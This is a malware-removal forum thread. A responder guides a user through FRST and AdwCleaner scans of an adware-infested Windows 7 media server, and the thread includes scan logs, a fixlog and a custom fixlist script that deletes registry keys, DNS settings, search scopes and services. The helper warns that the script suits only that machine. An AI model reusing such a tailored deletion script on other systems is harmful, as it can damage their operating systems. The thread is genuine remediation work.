FirewallRules: [{CD3C9B1F-3716-4C7C-AF06-C860FBD0202A}] => (Allow) C:\ProgramData\AzekMui\vejaoly.EXE
FirewallRules: [{9DE3DDD0-FC13-457B-ADA4-C8B8DFDE9A72}] => (Allow) C:\ProgramData\AzekMui\vejaoly.EXE
FirewallRules: [{2BC90061-5B13-44AB-988D-A5083EC775A8}] => (Allow) C:\Program Files (x86)\Itibiti Soft Phone\Itibiti.exe
FirewallRules: [{2149BC15-82F9-461B-A20E-87A752626F20}] => (Allow) C:\Program Files (x86)\Itibiti Soft Phone\Itibiti.exe
FirewallRules: [TCP Query User{FFBEA0F4-812C-42B2-A0DE-D9C9F8207027}C:\program files (x86)\itibiti soft phone\itibiti.exe] => (Block) C:\program files (x86)\itibiti soft phone\itibiti.exe
FirewallRules: [UDP Query User{E0A42B5D-1FDE-40CD-990C-0D1A6BAA3E82}C:\program files (x86)\itibiti soft phone\itibiti.exe] => (Block) C:\program files (x86)\itibiti soft phone\itibiti.exe
FirewallRules: [{1A7529E0-F6CC-485E-9F74-358F537266A8}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
13-01-2016 17:21:28 Restore Operation
14-01-2016 19:49:24 Installed Realtek Ethernet Controller Driver
14-01-2016 20:30:18 Installed Realtek Ethernet Diagnostic Utility
14-01-2016 21:20:40 Installed Realtek Ethernet Controller Driver
15-01-2016 14:39:09 Configured Realtek Ethernet Diagnostic Utility
15-01-2016 19:11:04 Installed Realtek Ethernet Controller Driver
15-01-2016 20:21:45 Restore Operation
16-01-2016 14:00:10 Installed Realtek 8136 8168 8169 Ethernet Driver
16-01-2016 14:02:02 Installed Realtek 8136 8168 8169 Ethernet Driver
16-01-2016 14:08:24 Installed Realtek 8136 8168 8169 Ethernet Driver
16-01-2016 14:09:56 Installed Realtek 8136 8168 8169 Ethernet Driver
16-01-2016 14:15:29 Installed Realtek Ethernet Controller Driver
16-01-2016 15:27:31 Installed Realtek 8136 8168 8169 Ethernet Driver
16-01-2016 16:17:06 Restore Operation
 
==================== Faulty Device Manager Devices =============
 
Name: Universal Serial Bus (USB) Controller
Description: Universal Serial Bus (USB) Controller
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (01/01/2016 12:23:01 AM) (Source: SideBySide) (EventID: 63) (User: )
Description: Activation context generation failed for "assemblyIdentity1".Error in manifest or policy file "assemblyIdentity2" on line assemblyIdentity3.
The value "*" of attribute "language" in element "assemblyIdentity" is invalid.
 
Error: (01/01/2016 12:19:11 AM) (Source: SideBySide) (EventID: 9) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
The manifest file root element must be assembly.
 
Error: (01/01/2010 01:15:11 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
.
 
Error: (01/01/2010 12:08:59 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
.
 
Error: (01/01/2010 12:06:14 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
.
 
Error: (01/01/2010 12:06:14 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
.
 
Error: (01/01/2010 12:05:50 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
.
 
Error: (01/01/2010 12:05:50 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
.
 
Error: (01/01/2010 12:05:50 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
.
 
Error: (01/01/2010 12:05:50 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
.
 
 
System errors:
=============
Error: (01/01/2016 03:05:05 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk5\DR12.
 
Error: (01/01/2016 03:05:04 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk5\DR12.
 
Error: (01/01/2016 03:05:03 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk5\DR12.
 
Error: (01/01/2016 03:02:05 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk5\DR11.
 
Error: (01/01/2016 03:02:04 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk5\DR11.
 
Error: (01/01/2016 03:02:03 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk5\DR11.
 
Error: (01/01/2016 01:43:41 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk5\DR10.
 
Error: (01/01/2016 01:43:41 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk5\DR10.
 
Error: (01/01/2016 01:43:40 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk5\DR10.
 
Error: (01/01/2016 01:39:57 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk5\DR9.
 
 
CodeIntegrity:
===================================
  Date: 2016-01-13 13:27:09.857
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\SysWOW64\drivers\DrvAgent64.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2016-01-13 13:27:09.842
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\SysWOW64\drivers\DrvAgent64.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2016-01-13 13:27:09.811
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\SysWOW64\drivers\DrvAgent64.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2016-01-13 13:27:09.795
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\SysWOW64\drivers\DrvAgent64.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2016-01-13 13:27:09.764
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\SysWOW64\drivers\DrvAgent64.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2016-01-13 13:27:09.748
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\SysWOW64\drivers\DrvAgent64.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2016-01-13 13:27:09.717
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\SysWOW64\drivers\DrvAgent64.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2016-01-13 13:27:09.701
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\SysWOW64\drivers\DrvAgent64.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2016-01-13 13:27:09.670
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\SysWOW64\drivers\DrvAgent64.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2016-01-13 13:27:09.623
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\SysWOW64\drivers\DrvAgent64.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
 
==================== Memory info =========================== 
 
Processor: AMD Athlon™ II X4 630 Processor
Percentage of memory in use: 50%
Total physical RAM: 3581.52 MB
Available physical RAM: 1777.13 MB
Total Virtual: 7161.23 MB
Available Virtual: 4631.99 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:117.09 GB) (Free:42.43 GB) NTFS
Drive d: (Nexus Drive 1) (Fixed) (Total:1863.01 GB) (Free:1746.94 GB) NTFS
Drive e: (Nexus Drive 2) (Fixed) (Total:1863.01 GB) (Free:335.32 GB) NTFS
Drive f: (Nexus Drive 3) (Fixed) (Total:1863.01 GB) (Free:1862.87 GB) NTFS
Drive g: (Nexus Drive 4) (Fixed) (Total:1863.01 GB) (Free:315.21 GB) NTFS
Drive h: (Nexus Drive 5) (Fixed) (Total:1745.83 GB) (Free:887.32 GB) NTFS
Drive k: (U3 System) (CDROM) (Total:0.01 GB) (Free:0 GB) CDFS
Drive l: (Cruzer) (Removable) (Total:3.74 GB) (Free:2.35 GB) FAT32
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: E49F8768)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=117.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=1745.8 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 7F7A6D28)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)
 
========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 7F7A6D37)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)
 
========================================================
Disk: 3 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 7F7A6D29)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)
 
========================================================
Disk: 4 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 7F7A6D2A)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)
 
========================================================
Disk: 5 (Size: 3.7 GB) (Disk ID: 00000000)
 
Partition: GPT.
 
==================== End of Addition.txt ============================


#8 Jo*

Jo*

  • Malware Response Team
  • 3,445 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:06:18 AM

Posted 18 January 2016 - 03:37 PM

Hello,
 

***

Open notepad. Please copy the contents of the code box below. To do this highlight the contents of the box and right click on it. Paste this into the open notepad.
Save it in the same location as / FSRT / FSRT64 (usually your desktop) as fixlist.txt
 
start
CreateRestorePoint:
EmptyTemp:
HKLM-x32\...\Run: [] => [X]
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION 
CHR HKU\S-1-5-21-2978377406-116969058-805938779-1000\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
Tcpip\Parameters: [NameServer] 
Tcpip\..\Interfaces\{741C0B6C-8464-40A4-ACF3-17FD982F9310}: [NameServer] 
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION 
HKU\S-1-5-21-2978377406-116969058-805938779-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = 
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 
SearchScopes: HKLM -> {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {A3CB1DBF-84A2-4510-9CB8-A041813AE8B9} URL = 
SearchScopes: HKU\.DEFAULT -> {4C4C7AAB-5854-4241-A414-E2F1EF119C4A} URL = hxxp://www.dnsbasic.com/?prt=DNSBASIC123&sp=&keywords={searchTerms} 
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> DefaultScope {A3CB1DBF-84A2-4510-9CB8-A041813AE8B9} URL = 
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = 
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> {4C4C7AAB-5854-4241-A414-E2F1EF119C4A} URL = hxxp://www.dnsbasic.com/?prt=dnsbsc50r1&sp=&keywords={searchTerms} 
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL = 
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> {C5DCB956-823D-4CFE-B643-355749621DA4} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL = 
S3 GoToAssist Remote Support Customer; "C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\857\g2ax_service.exe" "Start=service" [X] 
S2 wmmserv_r11; C:\Program Files (x86)\Windows Network Services\v9\wmnserv.exe [X]
S3 nusb3hub; system32\DRIVERS\nusb3hub.sys [X] 
S3 nusb3xhc; system32\DRIVERS\nusb3xhc.sys [X] 
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] 
S3 tsusbhub; system32\drivers\tsusbhub.sys [X] 
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
end
NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system


Run FRST / FSRT64 again like we did before but this time press the Fix button just once and wait.
The tool will make a log (Fixlog.txt) please post it to your reply.

---

How the computer is running now?

***

Please download AdwCleaner by Xplode and save to your Desktop.[/color]
Double-click AdwCleaner.exe
Vista / Windows 7/8 users right-click and select Run As Administrator.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
    The actual line should say "Pending. Please uncheck elements you do not want to remove" => scan is complete.
  • After the scan has finished, click on the Report button...a logfile (AdwCleaner[R0].txt) will open in Notepad for review.
  • The contents of the log file may be confusing. Unless you see a program name that you know should not be removed, don't worry about it.
    If you see an entry you want to keep, let me know about it.
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of all logfiles are saved in the C:\AdwCleaner folder which was created when running the tool.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#9 dougsgirl

dougsgirl
  • Topic Starter

  • Members
  • 17 posts
  • OFFLINE
  •  
  • Local time:11:18 PM

Posted 18 January 2016 - 04:11 PM

OMG I'm on the internet with this computer! Ha Awesome! 
 
Ok heres the fixlog. Running Adwcleaner now 
 
 
 
Fix result of Farbar Recovery Scan Tool (x64) Version:17-01-2015
Ran by Nexus Media Server (2016-01-01 03:55:12) Run:1
Running from C:\Users\Nexus Media Server\Desktop
Loaded Profiles: Nexus Media Server (Available Profiles: Nexus Media Server & LogMeInRemoteUser)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
EmptyTemp:
HKLM-x32\...\Run: [] => [X]
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION 
CHR HKU\S-1-5-21-2978377406-116969058-805938779-1000\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
Tcpip\Parameters: [NameServer] 
Tcpip\..\Interfaces\{741C0B6C-8464-40A4-ACF3-17FD982F9310}: [NameServer] 
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION 
HKU\S-1-5-21-2978377406-116969058-805938779-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = 
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 
SearchScopes: HKLM -> {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {A3CB1DBF-84A2-4510-9CB8-A041813AE8B9} URL = 
SearchScopes: HKU\.DEFAULT -> {4C4C7AAB-5854-4241-A414-E2F1EF119C4A} URL = hxxp://www.dnsbasic.com/?prt=DNSBASIC123&sp=&keywords={searchTerms} 
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> DefaultScope {A3CB1DBF-84A2-4510-9CB8-A041813AE8B9} URL = 
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = 
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> {4C4C7AAB-5854-4241-A414-E2F1EF119C4A} URL = hxxp://www.dnsbasic.com/?prt=dnsbsc50r1&sp=&keywords={searchTerms} 
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL = 
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> {C5DCB956-823D-4CFE-B643-355749621DA4} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL = 
S3 GoToAssist Remote Support Customer; "C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\857\g2ax_service.exe" "Start=service" [X] 
S2 wmmserv_r11; C:\Program Files (x86)\Windows Network Services\v9\wmnserv.exe [X]
S3 nusb3hub; system32\DRIVERS\nusb3hub.sys [X] 
S3 nusb3xhc; system32\DRIVERS\nusb3xhc.sys [X] 
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] 
S3 tsusbhub; system32\drivers\tsusbhub.sys [X] 
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
end
*****************
 
Restore point was successfully created.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
"HKLM\SOFTWARE\Policies\Google" => key removed successfully
"HKU\S-1-5-21-2978377406-116969058-805938779-1000\SOFTWARE\Policies\Google" => key removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\NameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{741C0B6C-8464-40A4-ACF3-17FD982F9310}\\NameServer => value removed successfully
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKU\S-1-5-21-2978377406-116969058-805938779-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}" => key removed successfully
HKCR\CLSID\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9} => key not found. 
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}" => key removed successfully
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found. 
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{CC865B26-C31D-4D23-B17B-96548EEF03F6}" => key removed successfully
HKCR\CLSID\{CC865B26-C31D-4D23-B17B-96548EEF03F6} => key not found. 
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{4C4C7AAB-5854-4241-A414-E2F1EF119C4A}" => key removed successfully
HKCR\CLSID\{4C4C7AAB-5854-4241-A414-E2F1EF119C4A} => key not found. 
HKU\S-1-5-21-2978377406-116969058-805938779-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\S-1-5-21-2978377406-116969058-805938779-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}" => key removed successfully
HKCR\CLSID\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9} => key not found. 
"HKU\S-1-5-21-2978377406-116969058-805938779-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{4C4C7AAB-5854-4241-A414-E2F1EF119C4A}" => key removed successfully
HKCR\CLSID\{4C4C7AAB-5854-4241-A414-E2F1EF119C4A} => key not found. 
"HKU\S-1-5-21-2978377406-116969058-805938779-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFDBDDAA-5D3F-42EE-B79C-185A7020515B}" => key removed successfully
HKCR\CLSID\{AFDBDDAA-5D3F-42EE-B79C-185A7020515B} => key not found. 
"HKU\S-1-5-21-2978377406-116969058-805938779-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{C5DCB956-823D-4CFE-B643-355749621DA4}" => key removed successfully
HKCR\CLSID\{C5DCB956-823D-4CFE-B643-355749621DA4} => key not found. 
"HKU\S-1-5-21-2978377406-116969058-805938779-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{CC865B26-C31D-4D23-B17B-96548EEF03F6}" => key removed successfully
HKCR\CLSID\{CC865B26-C31D-4D23-B17B-96548EEF03F6} => key not found. 
GoToAssist Remote Support Customer => service removed successfully
wmmserv_r11 => service removed successfully
nusb3hub => service removed successfully
nusb3xhc => service removed successfully
Synth3dVsc => service removed successfully
tsusbhub => service removed successfully
VGPU => service removed successfully
EmptyTemp: => 530.1 MB temporary data Removed.
 
 
The system needed a reboot.
 
==== End of Fixlog 03:57:31 ====


#10 dougsgirl

dougsgirl
  • Topic Starter

  • Members
  • 17 posts
  • OFFLINE
  •  
  • Local time:11:18 PM

Posted 18 January 2016 - 04:24 PM

Since this is not my computer I really dont know if theres anything to keep :-) So whatever looks like it needs to go...it goes :-) lol

 

# AdwCleaner v5.029 - Logfile created 15/01/2016 at 19:57:38
# Updated 11/01/2016 by Xplode
# Database : 2016-01-11.2 [Local]
# Operating system : Windows 7 Ultimate Service Pack 1 (x64)
# Username : Nexus Media Server - NEXUS_MEDIA_SVR
# Running from : L:\AdwCleaner.exe
# Option : Scan
 
***** [ Services ] *****
 
Service Found : BrsHelper
Service Found : sbmntr
Service Found : netmon_wfp
Service Found : Program Manager
 
***** [ Folders ] *****
 
Folder Found : C:\Program Files\Uninstaller
Folder Found : C:\Program Files (x86)\DnsBasic
Folder Found : C:\Program Files (x86)\eSupport.com
Folder Found : C:\Program Files (x86)\globalUpdate
Folder Found : C:\Program Files (x86)\PepperZip
Folder Found : C:\Program Files (x86)\predm
Folder Found : C:\Program Files (x86)\VideoPerformer
Folder Found : C:\Program Files (x86)\YTDownloader
Folder Found : C:\Program Files (x86)\speed browser
Folder Found : C:\Program Files (x86)\DriverToolkit
Folder Found : C:\Program Files (x86)\Itibiti Soft Phone
Folder Found : C:\Program Files (x86)\BitSavver
Folder Found : C:\Program Files (x86)\CiouupExxtenssion
Folder Found : C:\Program Files (x86)\CoolSaleCoupaoNa
Folder Found : C:\Program Files (x86)\DiscounTTExTTENsi
Folder Found : C:\Program Files (x86)\PriceDowinloader
Folder Found : C:\Program Files (x86)\RandomuPiriece
Folder Found : C:\Program Files (x86)\RoboSaveirr
Folder Found : C:\Program Files (x86)\saviInushoop
Folder Found : C:\Program Files (x86)\TakeuTuhoEiCouPon
Folder Found : C:\Program Files (x86)\PriceDowinloader
Folder Found : C:\Program Files (x86)\MediaPlayerV1
Folder Found : C:\Program Files (x86)\MediaViewV1
Folder Found : C:\Program Files (x86)\RichMediaViewV1
Folder Found : C:\Program Files (x86)\Mozilla Firefox\Extensions\{650EED71-89E2-453B-8DCF-2AA1B4AE6EF3}
Folder Found : C:\Program Files (x86)\Common Files\ProgramManager
Folder Found : C:\ProgramData\Browser
Folder Found : C:\ProgramData\Conduit
Folder Found : C:\ProgramData\DnsBasic
Folder Found : C:\ProgramData\PriceDowinloader
Folder Found : C:\ProgramData\cosstminn
Folder Found : C:\ProgramData\EEnjouyCCoupon
Folder Found : C:\ProgramData\PriceDowinloader
Folder Found : C:\ProgramData\RoboSAvEri
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eSupport.com
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PepperZip
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverToolkit
Folder Found : C:\Users\LogMeInRemoteUser\AppData\Local\torch
Folder Found : C:\Users\Nexus Media Server\AppData\Local\Boost
Folder Found : C:\Users\Nexus Media Server\AppData\Local\eSupport.com
Folder Found : C:\Users\Nexus Media Server\AppData\Local\globalUpdate
Folder Found : C:\Users\Nexus Media Server\AppData\Local\SmartWeb
Folder Found : C:\Users\Nexus Media Server\AppData\Local\BreakingNewsAlert
Folder Found : C:\Users\Nexus Media Server\AppData\Local\DriverToolkit
Folder Found : C:\Users\Nexus Media Server\AppData\Local\BrowserHelper
Folder Found : C:\Users\Nexus Media Server\AppData\Local\Installer\Install_10599
Folder Found : C:\Users\Nexus Media Server\AppData\Local\Installer\Install_13063
Folder Found : C:\Users\Nexus Media Server\AppData\Local\Installer\Install_133
Folder Found : C:\Users\Nexus Media Server\AppData\Local\Installer\Install_21127
Folder Found : C:\Users\Nexus Media Server\AppData\Local\Installer\Install_27892
Folder Found : C:\Users\Nexus Media Server\AppData\Local\Installer\Install_6498
Folder Found : C:\Users\Nexus Media Server\AppData\LocalLow\Conduit
Folder Found : C:\Users\Nexus Media Server\AppData\Roaming\ap_logs
Folder Found : C:\Users\Nexus Media Server\AppData\Roaming\PerformerSoft
Folder Found : C:\Users\Nexus Media Server\AppData\Roaming\Strongvault
Folder Found : C:\Users\Nexus Media Server\AppData\Roaming\lection
Folder Found : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PepperZip
Folder Found : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoPerformer
Folder Found : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YTDownloader
Folder Found : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games Bot
Folder Found : C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\Smartbar
Folder Found : C:\Users\Nexus Media Server\Documents\Mobogenie
Folder Found : C:\Windows\Microsoft\sogrMed
Folder Found : C:\Windows\SysNative\Tasks\Astromenda
Folder Found : C:\Windows\SysNative\Tasks\YTDownloader
 
***** [ Files ] *****
 
File Found : C:\Program Files (x86)\Mozilla Firefox\my.cfg
File Found : C:\Program Files\Common Files\System\SysMenu.dll
File Found : C:\Program Files\Common Files\System\SysMenu64.dll
File Found : C:\Users\LogMeInRemoteUser\Desktop\PepperZip.lnk
File Found : C:\Users\Nexus Media Server\daemonprocess.txt
File Found : C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_cdncache-a.akamaihd.net_0.localstorage
File Found : C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_cdncache-a.akamaihd.net_0.localstorage-journal
File Found : C:\Users\Nexus Media Server\AppData\Roaming\aps.scan.quick.results
File Found : C:\Users\Nexus Media Server\AppData\Roaming\aps.scan.results
File Found : C:\Users\Nexus Media Server\AppData\Roaming\aps.uninstall.scan.results
File Found : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Knctr.lnk
File Found : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bm.lnk
File Found : C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\invalidprefs.js
File Found : C:\Users\Nexus Media Server\Desktop\Continue VuuPC Installation.lnk
File Found : C:\Users\Nexus Media Server\Desktop\Find Drivers with DriverAgent.lnk
